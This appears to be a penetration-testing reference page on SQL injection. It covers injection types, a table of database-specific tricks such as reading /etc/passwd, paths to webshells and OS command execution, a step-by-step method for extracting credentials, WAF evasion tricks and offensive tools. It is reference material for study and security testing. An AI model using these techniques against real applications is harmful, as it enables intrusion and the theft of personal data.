SQL Injection
Category: Web MITRE ATT&CK: Initial Access / Execution — T1190 (Exploit Public-Facing Application) Related: Web Application Testing, Xss, Privilege Escalation Linux
Overview
SQL Injection (SQLi) occurs when attacker-controlled input is incorporated into SQL queries without proper sanitization or parameterization. It is consistently ranked in the OWASP Top 10 and can result in data exfiltration, authentication bypass, and in some cases OS-level code execution.
How It Works
Types
- In-band (Classic): Results returned in HTTP response. Subtypes:
- Error-based: DB errors leak schema/data.
- Union-based:
UNION SELECTappends attacker-controlled rows.
- Blind: No visible output; infer data via behavior.
- Boolean-based: Different response for true vs. false conditions.
- Time-based:
SLEEP()/WAITFOR DELAYto infer truth.
- Out-of-band: Data exfiltrated via DNS/HTTP requests (
xp_dirtree,load_fileto attacker server).
Common DB-Specific Tricks
| DB | Version Query | Sleep | File Read |
|---|---|---|---|
| MySQL | SELECT @@version | SLEEP(5) | LOAD_FILE('/etc/passwd') |
| MSSQL | SELECT @@version | WAITFOR DELAY '0:0:5' | OPENROWSET |
| PostgreSQL | SELECT version() | pg_sleep(5) | COPY TO/FROM |
| Oracle | SELECT banner FROM v$version | dbms_pipe.receive_message | UTL_FILE |
| SQLite | SELECT sqlite_version() | n/a | n/a |
Privilege Escalation via SQLi
- MySQL
FILEprivilege →INTO OUTFILEwebshell - MSSQL
xp_cmdshell(may need enabling) → OS command execution - PostgreSQL
COPY FROM PROGRAM→ OS command execution
Attack Methodology
- Identify injection points: GET/POST params, cookies, headers (User-Agent, Referer, X-Forwarded-For), JSON/XML bodies.
- Probe with
',",\,)— look for errors or behavioral changes. - Determine injection type (in-band vs. blind).
- Map DB: version, current user, current DB, list of tables.
- Extract target data (credentials, PII, sensitive tables).
- Escalate if DB user has elevated privileges (FILE, xp_cmdshell).
Detection & Evasion Notes
- WAFs block common keywords (
UNION,SELECT,--). - Evasion: comment variants (
/*!UNION*/), case mixing (SeLeCt), URL/double encoding, whitespace alternatives (%09,%0a,/**/), HTTP parameter pollution. - Blind SQLi is harder to detect; time-based leaves timing artifacts in logs.
- Parameterized queries / prepared statements are the complete defense.
Tools
sqlmap— full-featured automated SQLi exploitation (--level,--risk,--tamper)ghauri— modern sqlmap alternative with better WAF evasion- Burp Suite Repeater / Intruder — manual testing
SQLMate— quick fingerprinting
References
- OWASP SQL Injection — owasp.org
- PortSwigger SQL Injection Labs
- PayloadsAllTheThings SQLi cheatsheet